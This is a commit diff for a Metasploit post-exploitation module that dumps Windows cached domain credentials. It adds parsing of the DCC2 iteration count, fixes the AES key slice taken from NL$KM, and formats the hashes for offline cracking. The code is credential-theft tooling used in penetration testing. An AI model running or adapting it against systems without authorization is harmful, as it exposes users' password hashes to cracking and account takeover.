Land #8580, cachedump iteration count fix
lands rogdham's fixes for the ms cache dump post module
This commit is contained in:
commit
722d9a278c
|
@ -64,6 +64,15 @@ class MetasploitModule < Msf::Post
|
|||
vprint_good "Username\t\t: #{username}"
|
||||
vprint_good "Hash\t\t: #{hash.unpack("H*")[0]}"
|
||||
|
||||
if lsa_vista_style?
|
||||
if (s.iterationCount > 10240)
|
||||
iterationCount = s.iterationCount & 0xfffffc00
|
||||
else
|
||||
iterationCount = s.iterationCount * 1024
|
||||
end
|
||||
vprint_good "Iteration count\t: #{s.iterationCount} -> real #{iterationCount}"
|
||||
end
|
||||
|
||||
last = Time.at(s.lastAccess)
|
||||
vprint_good "Last login\t\t: #{last.strftime("%F %T")} "
|
||||
|
||||
|
@ -152,6 +161,7 @@ class MetasploitModule < Msf::Post
|
|||
[
|
||||
username,
|
||||
hash.unpack("H*")[0],
|
||||
iterationCount,
|
||||
logonDomainName,
|
||||
dnsDomainName,
|
||||
last.strftime("%F %T"),
|
||||
|
@ -168,7 +178,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
vprint_good "----------------------------------------------------------------------"
|
||||
if lsa_vista_style?
|
||||
return "#{username.downcase}:$DCC2$##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
|
||||
return "#{username.downcase}:$DCC2$#{iterationCount}##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
|
||||
else
|
||||
return "#{username.downcase}:M$#{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
|
||||
end
|
||||
|
@ -195,6 +205,7 @@ class MetasploitModule < Msf::Post
|
|||
:revision,
|
||||
:sidCount,
|
||||
:valid,
|
||||
:iterationCount,
|
||||
:sifLength,
|
||||
:logonPackage,
|
||||
:dnsDomainNameLength,
|
||||
|
@ -228,7 +239,8 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
s.revision = cache_data[40,4].unpack("V")[0]
|
||||
s.sidCount = cache_data[44,4].unpack("V")[0]
|
||||
s.valid = cache_data[48,4].unpack("V")[0]
|
||||
s.valid = cache_data[48,2].unpack("v")[0]
|
||||
s.iterationCount = cache_data[50,2].unpack("v")[0]
|
||||
s.sifLength = cache_data[52,4].unpack("V")[0]
|
||||
|
||||
s.logonPackage = cache_data[56,4].unpack("V")[0]
|
||||
|
@ -253,7 +265,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def decrypt_hash_vista(edata, nlkm, ch)
|
||||
aes = OpenSSL::Cipher.new('aes-128-cbc')
|
||||
aes.key = nlkm[16...-1]
|
||||
aes.key = nlkm[16...32]
|
||||
aes.padding = 0
|
||||
aes.decrypt
|
||||
aes.iv = ch
|
||||
|
@ -275,6 +287,7 @@ class MetasploitModule < Msf::Post
|
|||
[
|
||||
"Username",
|
||||
"Hash",
|
||||
"Hash iteration count",
|
||||
"Logon Domain Name",
|
||||
"DNS Domain Name",
|
||||
"Last Login",
|
||||
|
@ -319,7 +332,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
|
||||
|
||||
print_status("Obtaining LK$KM...")
|
||||
print_status("Obtaining NL$KM...")
|
||||
nlkm = capture_nlkm(lsakey)
|
||||
vprint_status("NL$KM: #{nlkm.unpack("H*")[0]}")
|
||||
|
||||
|
@ -329,7 +342,7 @@ class MetasploitModule < Msf::Post
|
|||
john = ""
|
||||
|
||||
ok.enum_value.each do |usr|
|
||||
if( "NL$Control" == usr.name) then
|
||||
if ( !usr.name.match(/^NL\$\d+$/) ) then
|
||||
next
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue